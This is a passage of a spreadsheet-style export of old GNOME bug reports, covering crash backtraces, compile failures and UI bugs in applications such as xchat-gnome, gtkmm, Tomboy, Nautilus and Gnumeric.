#37 0x4eb7b574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#38 0x0806306b in fe_main ()
No symbol table info available.
#39 0x080a0370 in main ()
No symbol table info available.
#0  0xffffe410 in __kernel_vsyscall ()</t>
  </si>
  <si>
    <t>xchat-gnome-maint</t>
  </si>
  <si>
    <t>andy.somerville</t>
  </si>
  <si>
    <t>GNOME-SYSTEM-TOOLS-336935</t>
  </si>
  <si>
    <t>users-admin</t>
  </si>
  <si>
    <t>Creating lots of users at once causes many groups to be deleted</t>
  </si>
  <si>
    <t>Please describe the problem:
If an administrator creates a large number of users at once before pressing 
OK then the users will not be added. In addition groups may be removed from 
the system.
Steps to reproduce:
1. Run users-admin 
2. Click Add User add a user.
3. Repeat step 2 fifteen times.
4. Click OK on main application window.
Actual results:
The users will not be added. In addition groups may be deleted. In one case 
the groups adm tty disk kmem dialout fax voice cdrom floppy tape 
sudo audio dip operator src shadow utmp video sasl plugdev staff 
users crontab ssh slocate scanner and admin were deleted.
Expected results:
The users should be created and no groups should be deleted.
Does this happen every time?
The users are not created but based on bug reports the groups may not always 
be removed.
Other information:
This is based on Ubuntu bug #31675 - 
https://launchpad.net/distros/ubuntu/+source/gnome-system-tools/+bug/31675</t>
  </si>
  <si>
    <t>GNOME-APPLETS-6004</t>
  </si>
  <si>
    <t>Webcontrol ignores urlhandler settings in favour of netscape</t>
  </si>
  <si>
    <t xml:space="preserve">Package: gnome-applets
Version: 1.1.2
Ages ago I altered my url handler settings in the control centre to 
include this:
default		gnome-terminal --title Dingus Things -e 'lynx %s'
This way any web business uses Lynx over my rather slow connection.
The webcontrol applet starts up netscape by default instead of using
the whatever-it-is that Gnome uses to handle urls.
This is a little inconsistent when you are expecting something else.
Would it be possible to make it honour the url-handler settings?
Telsa
PS: the 'about' box: the green square which the words sit on is a 
little too small: the final line is half on the green square a
quarter on the border and a quarter (the bottom of the 'p's)
not there at all.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 16:54 -------
This bug was previously known as bug 6004 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=6004
Originally filed under the gnome-applets product and general component.
Reassigning to the default owner of the component gnome-applets-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>hobbit</t>
  </si>
  <si>
    <t>GTKMM-759263</t>
  </si>
  <si>
    <t>Build failure: widget.cc:426:17: error: 'virtual Gtk::Widget::~Widget()' has a different exception specifier</t>
  </si>
  <si>
    <t>Created attachment 317056
build.log
Hi
While upgrading from GNOME 3.16 to 3.18 on Gentoo Linux ia64 gtkmm 3.18.0 failed to compile with gcc 4.7:
/var/tmp/portage/dev-cpp/gtkmm-3.18.0-r1/work/gtkmm-3.18.0/gtk/gtkmm/widget.cc:426:17: error: declaration of 'virtual Gtk::Widget::~Widget()' has a different exception specifier
In file included from /var/tmp/portage/dev-cpp/gtkmm-3.18.0-r1/work/gtkmm-3.18.0/gtk/gtkmm/widget.cc:6:0:
/var/tmp/portage/dev-cpp/gtkmm-3.18.0-r1/work/gtkmm-3.18.0/gtk/gtkmm/widget.h:340:11: error: from previous declaration 'virtual Gtk::Widget::~Widget() noexcept (true)'
This is a regression from gtkmm 3.16.x.
A similar issue was reported on gtkmm 3.18.0 (bug #759262).
A similar issue was recently fixed on glibmm 2.46.x (bug #758798).
     Ã‰meric</t>
  </si>
  <si>
    <t>emeric.maschino</t>
  </si>
  <si>
    <t>TOTEM-479272</t>
  </si>
  <si>
    <t>Movie player</t>
  </si>
  <si>
    <t>Confusing PyGtk configure failure message</t>
  </si>
  <si>
    <t>+++ This bug was initially created as a clone of Bug #471530 +++
If [a sufficient version of] gnome-python-desktop is not installed but PyGTK and Python development packages are then
./configure --enable-python
ends with the following failure:
...
checking for PYGTK... no
configure: error: Python not found
This is quite confusing and one has to read the logs to find out why it thinks that PyGTK and Python are not present -- to realize it was actually looking for gnome-python-desktop.
Patch is in the original bug</t>
  </si>
  <si>
    <t>GNOME-APPLETS-165879</t>
  </si>
  <si>
    <t>modemlights</t>
  </si>
  <si>
    <t>storage size of 'ifreq' isn't known-</t>
  </si>
  <si>
    <t>Please describe the problem:
When compiling 'gnome-applets-2.8.2' I receive the error below:
ccache gcc -g -O3 -mtune=ev56 -mcpu=ev56 -mieee -funroll-loops -mmax -ffast-
math -fstrict-aliasing -pipe -fexpensive-optimizations -finline -foptimize-
register-move -foptimize-sibling-calls -fomit-frame-pointer -o mixer_applet2 
mixer.o -Wl--export-dynamic -Wl--export-dynamic  /usr/lib/libgstinterfaces-
0.8.so /usr/lib/libgstreamer-0.8.so -pthread -L/usr/X11R6/lib /usr/lib/libpanel-
applet-2.so /usr/lib/libgnomeui-
2.so /usr/lib/libSM.so /usr/lib/libICE.so /usr/lib/libbonoboui-
2.so /usr/lib/libxml2.so -lpthread -lz /usr/lib/libgnomecanvas-
2.so /usr/lib/libgnome-
2.so /usr/lib/libpopt.so /usr/lib/libart_lgpl_2.so /usr/lib/libpangoft2-
1.0.so /usr/lib/libgtk-x11-2.0.so /usr/lib/libgdk-x11-2.0.so /usr/lib/libatk-
1.0.so /usr/lib/libgdk_pixbuf-2.0.so /usr/lib/libpangoxft-
1.0.so /usr/lib/libpangox-1.0.so /usr/lib/libpango-1.0.so /usr/lib/libgobject-
2.0.so /usr/lib/libbonobo-2.so /usr/lib/libgconf-2.so /usr/lib/libgnomevfs-
2.so /usr/lib/libbonobo-activation.so /usr/lib/libORBit-2.so -
lm /usr/lib/libgmodule-2.0.so -ldl /usr/lib/libgthread-2.0.so /usr/lib/libglib-
2.0.so
Found cached translation database
Merging translations into mixer.schemas.
Found cached translation database
Merging translations into GNOME_MixerApplet.server.
Making all in modemlights
Making all in docs
Making all in C
Making all in eu
In file included from modemlights.c:44:
/usr/include/linux/if_ppp.h:101: error: field `b' has incomplete type
/usr/include/linux/if_ppp.h:106: error: field `b' has incomplete type
modemlights.c: In function `get_modem_stats':
modemlights.c:328: error: storage size of 'ifreq' isn't known
modemlights.c:332: error: `IFNAMSIZ' undeclared (first use in this function)
modemlights.c:332: error: (Each undeclared identifier is reported only once
modemlights.c:332: error: for each function it appears in.)
modemlights.c:334: error: `caddr_t' undeclared (first use in this function)
make[3]: *** [modemlights.o] Error 1
make[2]: *** [all-recursive] Error 1
make[1]: *** [all-recursive] Error 1
make: *** [all] Error 2
Steps to reproduce:
1. run ./configure
2. then make -s
3. wait...
Actual results:
Expected results:
Everything compiles and then firing up GNOME-2.8.2 [yea baby!]
Does this happen every time?
sure does
Other information:
I was running the following:
Redhat 7.2
Kernel-2.4.27
GCC-3.4.3
Make-3.8
Binutils-2.15
GTK-2.6.1
GLIB-2.6.1</t>
  </si>
  <si>
    <t>diskman</t>
  </si>
  <si>
    <t>GNOME-CORE-27436</t>
  </si>
  <si>
    <t>I added the main menu to panel</t>
  </si>
  <si>
    <t xml:space="preserve">Package:  panel
Severity: normal
Version:  1.2.2.1
Synopsis: I added the main menu to panel
Class:    sw-bug
Distribution: Red Hat Linux release 6.2 (Zoot)
System: Linux 2.2.16 i686 unknown
C library: glibc-2.1.3-15
C compiler: egcs-2.91.66
glib: 1.2.8
GTK+: 1.2.8
ORBit: ORBit 0.5.3
gnome-libs: gnome-libs 1.2.4
libxml: 1.8.10
gnome-print: gnome-print-0.20
gnome-core: gnome-core 1.2.2.1
Description:
It showed some rectangles and then I heard the crash sound and hten
seen the dialog.
Debugging information:
0x405a18e9 in __wait4 () from /lib/libc.so.6
#0  0x405a18e9 in __wait4 () from /lib/libc.so.6
#1  0x406001ec in ?? () from /lib/libc.so.6
#2  0x4015d131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
#3  0x4052ec68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
#4  0x400a5a2f in g_strconcat (
    string1=0x8578e38 s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/...)
    at gstrfuncs.c:175
#5  0x404332b0 in g_concat_dir_and_file () from /usr/lib/libgnome.so.32
#6  0x8065903 in add_drawers_from_dir ()
#7  0x8065941 in add_drawers_from_dir ()
#8  0x8065a2f in add_menudrawer_to_panel ()
#9  0x4029f25d in gtk_marshal_NONE__NONE (object=0x82b5b60 
    func=0x80659e0  func_data=0x844c630 
    args=0xbfffee34) at gtkmarshal.c:312
#10 0x402cc9ed in gtk_handlers_run (handlers=0x84d0008 signal=0xbfffedf0 
    object=0x82b5b60 params=0xbfffee34 after=0) at gtksignal.c:1917
#11 0x402cbe32 in gtk_signal_real_emit (object=0x82b5b60 signal_id=75 
    params=0xbfffee34) at gtksignal.c:1477
#12 0x402c9f35 in gtk_signal_emit (object=0x82b5b60 signal_id=75)
    at gtksignal.c:552
#13 0x402ff498 in gtk_widget_activate (widget=0x82b5b60) at gtkwidget.c:2886
#14 0x402a688b in gtk_menu_shell_activate_item (menu_shell=0x81f24a0 
    menu_item=0x82b5b60 force_deactivate=1) at gtkmenushell.c:849
#15 0x402a5c0b in gtk_menu_shell_button_release (widget=0x81f24a0 
    event=0x8163dbc) at gtkmenushell.c:485
#16 0x4029ee29 in gtk_marshal_BOOL__POINTER (object=0x81f24a0 
    func=0x402a5a90  func_data=0x0 
    args=0xbffff1a8) at gtkmarshal.c:28
#17 0x402cbe6b in gtk_signal_real_emit (object=0x81f24a0 signal_id=27 
    params=0xbffff1a8) at gtksignal.c:1492
#18 0x402c9f35 in gtk_signal_emit (object=0x81f24a0 signal_id=27)
    at gtksignal.c:552
#19 0x402ff34c in gtk_widget_event (widget=0x81f24a0 event=0x8163dbc)
    at gtkwidget.c:2860
#20 0x4029ed82 in gtk_propagate_event (widget=0x82b5b60 event=0x8163dbc)
    at gtkmain.c:1313
#21 0x4029dfda in gtk_main_do_event (event=0x8163dbc) at gtkmain.c:770
#22 0x4034956b in gdk_event_dispatch (source_data=0x0 
    current_time=0xbffff52c user_data=0x0) at gdkevents.c:2129
#23 0x4009c1b6 in g_main_dispatch (dispatch_time=0xbffff52c) at gmain.c:656
#24 0x4009c781 in g_main_iterate (block=1 dispatch=1) at gmain.c:877
#25 0x4009c921 in g_main_run (loop=0x80a19e8) at gmain.c:935
#26 0x4029d919 in gtk_main () at gtkmain.c:476
#27 0x8055f7e in main ()
#28 0x405289cb in __libc_start_main (main=0x8055c50  argc=3 
    argv=0xbffff5f4 init=0x8053294  fini=0x808eaac  
    rtld_fini=0x4000ae60  stack_end=0xbffff5ec)
    at ../sysdeps/generic/libc-start.c:92
#0  0x405a18e9 in __wait4 () from /lib/libc.so.6
No locals.
#1  0x406001ec in ?? () from /lib/libc.so.6
No symbol table info available.
#2  0x4015d131 in gnome_segv_handle () from /usr/lib/libgnomeui.so.32
No symbol table info available.
#3  0x4052ec68 in __restore ()
    at ../sysdeps/unix/sysv/linux/i386/sigaction.c:127
No locals.
#4  0x400a5a2f in g_strconcat (
    string1=0x8578e38 s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/...)
    at gstrfuncs.c:175
l = 139684048
args = 0x85368d0
s = (gchar *) 0xbfffeb00 \224Â§J\bÃŠ
concat = (
    gchar *) 0x85368d0 /etc/X11/applnk/Utilities/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/s/...
#5  0x404332b0 in g_concat_dir_and_file () from /usr/lib/libgnome.so.32
No symbol table info available.
#6  0x8065903 in add_drawers_from_dir ()
No symbol table info available.
#7  0x8065941 in add_drawers_from_dir ()
No symbol table info available.
------- Bug moved to this database by debbugs-export@bugzilla.gnome.org 2001-01-27 13:15 -------
This bug was previously known as bug 27436 at http://bugs.gnome.org/
http://bugs.gnome.org/show_bug.cgi?id=27436
Originally filed under the gnome-core product and panel component.
Unknown version 1.2.x in product gnome-core. Setting version to the default unspecified.
The original reporter (captain@isdn.net.il) of this bug does not have an account here.
Reassigning to the exporter debbugs-export@bugzilla.gnome.org.
Reassigning to the default owner of the component panel-maint@bugzilla.gnome.org.
</t>
  </si>
  <si>
    <t>captain</t>
  </si>
  <si>
    <t>GNUMERIC-135609</t>
  </si>
  <si>
    <t>Range lost</t>
  </si>
  <si>
    <t xml:space="preserve">[Originally reported as http://bugs.debian.org/235120]
Subject: Bug#235120: gnumeric: range in $B$1:$B1 lost on save
From: Philipp Matthias Hahn 
Date: Fri 27 Feb 2004 15:46:12 +0100
Message-Id: 
Package: gnumeric
Version: 1.2.6-1
Severity: normal
gnumeric simplifies to much on save and looses the range:
1. Create sheet with A1:
        =sum($B$1:$B1)
2. Copy A1 and paste to A2
3. Save to file
4. Load from file
5. A2 now reads:
        =sum($B$1)
You can also grep the file directly and find it saved wrong:
$ zgrep ExprID Book1.gnumeric
        =sum($B$1)
        </t>
  </si>
  <si>
    <t>jdassen</t>
  </si>
  <si>
    <t>TOMBOY-171896</t>
  </si>
  <si>
    <t>TOMBOY</t>
  </si>
  <si>
    <t>Duplicated shortcut causes crash and prevents reload</t>
  </si>
  <si>
    <t>Version details: Tomboy v0.3.1
Distribution/Version: Ubuntu 5.04 (Warty Warthog)
1. Open Preferences-&gt;Hotkeys
2. Edit one hotkey to use an already assigned shortcut elsewhere in Gnome e.g
edit Search notes replacing disabled with F.
3. If you intend to assign F10 you need to type a 1 next but that will
mean - briefly - assigning F1 which is usually used by Gnome for the
Applications menu.
4. Tomboy crashes
5. Reload panel
6. Error message on Tomboy panel applet - delete or reload. Reload repeats error.
7. To solve edit gconf hotkey string to resolve shortcut conflict
Obviously a user who knows of this could edit the gconf string to start with
or carefully enter the characters in a different order within the Tomboy prefs.
It would seem sensible to grab the shortcut from a keypress as the Gnome capplet
does. An already assigned shortcut like F1 would be grabbed by Gnome before
reaching Tomboy I guess? You may well be intending to implement this anyway I
just wanted to bring the bug to your attention in case you didn't know.</t>
  </si>
  <si>
    <t>tomboy-maint</t>
  </si>
  <si>
    <t>phy1snb</t>
  </si>
  <si>
    <t>NAUTILUS-46859</t>
  </si>
  <si>
    <t>GTK signal macros don't work in non-GCC compilers for void return types</t>
  </si>
  <si>
    <t xml:space="preserve">libnautilus-extensions/nautilus-gtk-macros.h uses several macros of the form:
((foo-&gt;signal == NULL) ? 0 : foo-&gt;signal(args))
where foo-&gt;signal(args) is sometimes an expression whose value is used and is
sometimes void (in which case the macro is of course used like a statement)
depending on which signal is being used.
Needless to say the type of the conditional expression is impossible to define
when foo-&gt;signal(args) has void type.  Any compiler other than gcc will complain
bitterly about this fact and ostracize you at parties even if the value of the
conditional expression isn't being used.  In fact I've heard rumors that
current gcc (and thus the next release) will also error out on such poorly
behaved expressions although I don't have an easy way to check.
Since the macros are sometimes used as statements with void values and sometimes
used as expressions with non-void values it is very hard to work around this
problem with a local patch.  I've been having to define expression and statement
versions of each macro and make a raft of modifications to the call sites.  I
would appreciate if the nautilus developers could find an alternative practice
which isn't so specific to gcc &lt;= 2.95.
------- Additional Comments From darin@bentspoon.com 2001-02-22 09:32:45 ----
It's easy to make a variant of the macro for void return type and another
variant for of the macro non-void return types -- I can also think and see if I
can come up with another solution. The problem for me is that I can't test the
fix without a non-GCC compiler to test with. It would be great if I could figure
out a way to make this fail on GCC as well. Perhaps with -pedantic it would
fail but we can't use that because so many headers are incompatible with it.
Does anyone know why this was not an issue when compiling on Solaris? Does the
Solaris C compiler also accept this non-standard code idiom?
------- Additional Comments From snickell@stanford.edu 2001-02-22 17:30:19 ----
Its not an issue on Solaris because everyone in their right mind uses gcc to
compile GNU stuff already. Most GNU/GNOME stuff of any size won't compile
without gcc and gmake anyway. Sun is also using gcc I believe.
------- Additional Comments From ghudson@mit.edu 2001-02-22 18:03:15 ----
It's true that a lot of gnome packages uses gcc-specific features.  (I've been
building GNOME on IRIX with the native cc and it's quite an uphill battle.)  So
far I have not seen any statement from any GNOME person as to whether this is
policy or just the result of {carelessness ignorance individual developer
preferences}.  There are certainly platforms where the native compiler is pretty
decent and where the gcc is relatively weak so it would be a bit of a shame to
decide that gcc should be assumed.
At any rate I think this particular problem should be addressed because (a) it
is much harder to patch around than a few instances of void pointer arithmetic
and (b) as I said earlier I believe the next version of gcc is unlikely to
allow (condition ? int_expression : void_expression) even if the current gcc does.
------- Additional Comments From darin@bentspoon.com 2001-02-22 18:05:53 ----
No need to convince me. I have this fixed already and I'm just working on the commit.
------- Additional Comments From victor@eazel.com 2001-02-26 20:04:46 ----
This is not an easy one for QE to verify here. Making ghudson@mit.edu reponsible
for the verification of the fix i.e. QA Contact. Please try and mark the report
verified else reopen. 
------- Bug moved to this database by unknown@bugzilla.gnome.org 2001-09-09 21:00 -------
</t>
  </si>
  <si>
    <t>darin</t>
  </si>
  <si>
    <t>ghudson</t>
  </si>
  <si>
    <t>PESSULUS-325365</t>
  </si>
  <si>
    <t>PESSULUS</t>
  </si>
  <si>
    <t>A couple UI fixes</t>
  </si>
  <si>
    <t>2005-12-31  Dennis Cranston  
	* Pessulus/lockdowncheckbutton.py:  Remove line feeds and
	extra spacing from tooltips generated from the schemas.
	* data/pessulus.glade:  Do not set initial visibility of dialog 
	to true so the dialog will open centered properly.</t>
  </si>
  <si>
    <t>pessulus-maint</t>
  </si>
  <si>
    <t>DESKBAR-APPLET-342874</t>
  </si>
  <si>
    <t>Typo for del.icio.us</t>
  </si>
  <si>
    <t>I found 2 typos for del.icio.us in desklicious where it's spelled as deli.icio.us.
Index: desklicious.py
===================================================================
RCS file: /cvs/gnome/deskbar-applet/deskbar/handlers/desklicious.pyv
retrieving revision 1.3
diff -u -r1.3 desklicious.py
--- desklicious.py      19 May 2006 15:24:40 -0000      1.3
+++ desklicious.py      25 May 2006 02:43:28 -0000
@@ -129 +129 @@
 def _check_requirements():
        #We need user and password
        if not deskbar.GCONF_CLIENT.get_string(GCONF_DELICIOUS_USER):
-               return (deskbar.Handler.HANDLER_HAS_REQUIREMENTS _(You need to configure your deli.icio.us account.) _on_config_account)
+               return (deskbar.Handler.HANDLER_HAS_REQUIREMENTS _(You need to configure your del.icio.us account.) _on_config_account)
        else:
-               return (deskbar.Handler.HANDLER_IS_CONFIGURABLE _(You can modify your deli.icio.us account.) _on_config_account)
+               return (deskbar.Handler.HANDLER_IS_CONFIGURABLE _(You can modify your del.icio.us account.) _on_config_account)
 HANDLERS = {
        DeliciousHandler : {</t>
  </si>
  <si>
    <t>EVOLUTION-323126</t>
  </si>
  <si>
    <t>default Search Bar is not the same as after Clear</t>
  </si>
  <si>
    <t>The default search bar shows a drop down to select the Category. After hitting
Clear this changes to Any Field Contains.
Steps to reproduce:
* start Evolution go to Tasks
* notice the Search Bar
* hit the Clear button
Reproducible: always
IMHO the Search Bar should default to Any Field Contains always. At least this
should be the same.</t>
  </si>
  <si>
    <t>guenther</t>
  </si>
  <si>
    <t>PAN-437686</t>
  </si>
  <si>
    <t>0.129 doesn't compile with recent MIPSpro C++ compiler on IRIX.</t>
  </si>
  <si>
    <t>Hello All
Just a heads up that 0.129 and 0.128 don't compile cleanly using MIPSpro 7.4.3 on IRIX 6.5.28. Havent tried anything before 0.128.
I'm configuring/compiling with: 
&gt; CC=c99 CFLAGS=-O0 CXXFLAGS=-O0 -c99 ./configure
&gt; gmake
Here's the gmake trace:
---begin
source='file-util.cc' object='file-util.o' libtool=no \
        DEPDIR=.deps depmode=sgi /bin/sh ../../depcomp \
        CC -DHAVE_CONFIG_H -I. -I. -I../..  -I../.. -I/usr/local/include/gmime-2.0 -I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include   -I/usr/local/include/glib-2.0 -I/usr/local/lib/glib-2.0/include   -I/usr/local/include     -O0 -c99 -c -o file-util.o file-util.cc
cc-1020 CC: ERROR File = file-util.cc Line = 113
  The identifier __func__ is undefined.
    pan_return_val_if_fail (!dirname_sv.empty() true)
    ^
cc-1020 CC: ERROR File = file-util.cc Line = 178
  The identifier __func__ is undefined.
    pan_return_val_if_fail (!fname.empty() ret)
    ^
cc-1020 CC: ERROR File = file-util.cc Line = 198
  The identifier __func__ is undefined.
    pan_return_val_if_fail (filename 
    ^
cc-1020 CC: ERROR File = file-util.cc Line = 218
  The identifier __func__ is undefined.
     pan_return_val_if_fail (is_nonempty_string (fname) NULL)
     ^
4 errors detected in the compilation of file-util.cc.
gmake[3]: *** [file-util.o] Error 2
gmake[3]: Leaving directory `/usr/people/avi/tmp/src/pan-0.129/pan/general'
gmake[2]: *** [all-recursive] Error 1
gmake[2]: Leaving directory `/usr/people/avi/tmp/src/pan-0.129/pan'
gmake[1]: *** [all-recursive] Error 1
gmake[1]: Leaving directory `/usr/people/avi/tmp/src/pan-0.129'
gmake: *** [all] Error 2
---end
Kind regards
Avi</t>
  </si>
  <si>
    <t>DIA-55075</t>
  </si>
  <si>
    <t>dia.pot not build by make</t>
  </si>
  <si>
    <t>dia.pot is not build my make which fails. Building it manually works.
Here is the error message:
make[2]: Entering directory `/home/hub/cvslocal/dia'
make[2]: *** No rule to make target `po/dia.pot' needed by
`core-translation-report'.  Stop.
make[2]: Leaving directory `/home/hub/cvslocal/dia'
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory `/home/hub/cvslocal/dia'
To reproduce delete po/dia.pot and perform a make.</t>
  </si>
  <si>
    <t>F-SPOT-326410</t>
  </si>
  <si>
    <t>Metadata</t>
  </si>
  <si>
    <t>F-SPOT</t>
  </si>
  <si>
    <t>jpeg exif metadata should use the same codepaths as tiff metadata</t>
  </si>
  <si>
    <t>currently the jpeg metadata loading still uses libexif it should be switched to using the tiff metadata.</t>
  </si>
  <si>
    <t>f-spot-maint</t>
  </si>
  <si>
    <t>lewing</t>
  </si>
  <si>
    <t>XCHAT-GNOME-391706</t>
  </si>
  <si>
    <t>crash in XChat-GNOME IRC Chat: i was trying to connec t...</t>
  </si>
  <si>
    <t>What were you doing when the application crashed?
i was trying to connec to different server
Distribution: Ubuntu 6.10 (edgy)
Gnome Release: 2.16.1 2006-10-02 (Ubuntu)
BugBuddy Version: 2.16.0
Memory status: size: 110768128 vsize: 0 resident: 110768128 share: 0 rss: 24547328 rss_rlim: 0
CPU usage: start_time: 1167697071 rtime: 0 utime: 351 stime: 0 cutime:329 cstime: 0 timeout: 22 it_real_value: 0 frequency: 0
Backtrace was generated from '/usr/bin/xchat-gnome'
(no debugging symbols found)
Using host libthread_db library /lib/tls/i686/cmov/libthread_db.so.1.
(no debugging symbols found)
[Thread debugging using libthread_db enabled]
[New Thread -1226959184 (LWP 11769)]
(no debugging symbols found)
0xffffe410 in __kernel_vsyscall ()
#0  0xffffe410 in __kernel_vsyscall ()
#1  0xb767034b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
#2  0xb7ee21b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
#3  
#4  0x08732b10 in ?? ()
#5  0x0806954e in navigation_tree_get_selected_session ()
#6  0xb7723b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#7  0xb771679b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#8  0xb7726b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#9  0xb77280b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#10 0xb7728279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#11 0xb7973935 in _gtk_action_emit_activate ()
   from /usr/lib/libgtk-x11-2.0.so.0
#12 0xb79747a8 in gtk_action_activate () from /usr/lib/libgtk-x11-2.0.so.0
#13 0xb7723b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
#14 0xb771679b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#15 0xb7726b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#16 0xb77280b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#17 0xb7728279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#18 0xb7b6c994 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
#19 0xb7a617d8 in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
#20 0xb7a62da2 in gtk_menu_shell_append () from /usr/lib/libgtk-x11-2.0.so.0
#21 0xb7a5a995 in gtk_menu_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
#22 0xb7a54b00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
#23 0xb7714fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
#24 0xb771679b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
#25 0xb77271e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
#26 0xb7727e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
#27 0xb7728279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
#28 0xb7b685f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
#29 0xb7a4def3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
#30 0xb7a4f0f7 in gtk_main_do_event () from /usr/lib/libgtk-x11-2.0.so.0
#31 0xb78d87ea in _gdk_events_init () from /usr/lib/libgdk-x11-2.0.so.0
#32 0xb76a2802 in g_main_context_dispatch () from /usr/lib/libglib-2.0.so.0
#33 0xb76a57df in g_main_context_check () from /usr/lib/libglib-2.0.so.0
#34 0xb76a5b89 in g_main_loop_run () from /usr/lib/libglib-2.0.so.0
#35 0xb7a4f574 in gtk_main () from /usr/lib/libgtk-x11-2.0.so.0
#36 0x0806306b in fe_main ()
#37 0x080a0370 in main ()
Thread 1 (Thread -1226959184 (LWP 11769)):
#0  0xffffe410 in __kernel_vsyscall ()
No symbol table info available.
#1  0xb767034b in __waitpid_nocancel ()
   from /lib/tls/i686/cmov/libpthread.so.0
No symbol table info available.
#2  0xb7ee21b6 in gnome_gtk_module_info_get () from /usr/lib/libgnomeui-2.so.0
No symbol table info available.
#3  
No symbol table info available.
#4  0x08732b10 in ?? ()
No symbol table info available.
#5  0x0806954e in navigation_tree_get_selected_session ()
No symbol table info available.
#6  0xb7723b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#7  0xb771679b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#8  0xb7726b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#9  0xb77280b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#10 0xb7728279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#11 0xb7973935 in _gtk_action_emit_activate ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#12 0xb79747a8 in gtk_action_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#13 0xb7723b29 in g_cclosure_marshal_VOID__VOID ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#14 0xb771679b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#15 0xb7726b93 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#16 0xb77280b7 in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#17 0xb7728279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#18 0xb7b6c994 in gtk_widget_activate () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#19 0xb7a617d8 in gtk_menu_shell_activate_item ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#20 0xb7a62da2 in gtk_menu_shell_append () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#21 0xb7a5a995 in gtk_menu_reorder_child () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#22 0xb7a54b00 in _gtk_marshal_BOOLEAN__BOXED ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#23 0xb7714fb9 in g_value_set_boxed () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#24 0xb771679b in g_closure_invoke () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#25 0xb77271e3 in g_signal_chain_from_overridden ()
   from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#26 0xb7727e7f in g_signal_emit_valist () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#27 0xb7728279 in g_signal_emit () from /usr/lib/libgobject-2.0.so.0
No symbol table info available.
#28 0xb7b685f8 in gtk_widget_get_default_style ()
   from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
#29 0xb7a4def3 in gtk_propagate_event () from /usr/lib/libgtk-x11-2.0.so.0
No symbol table info available.
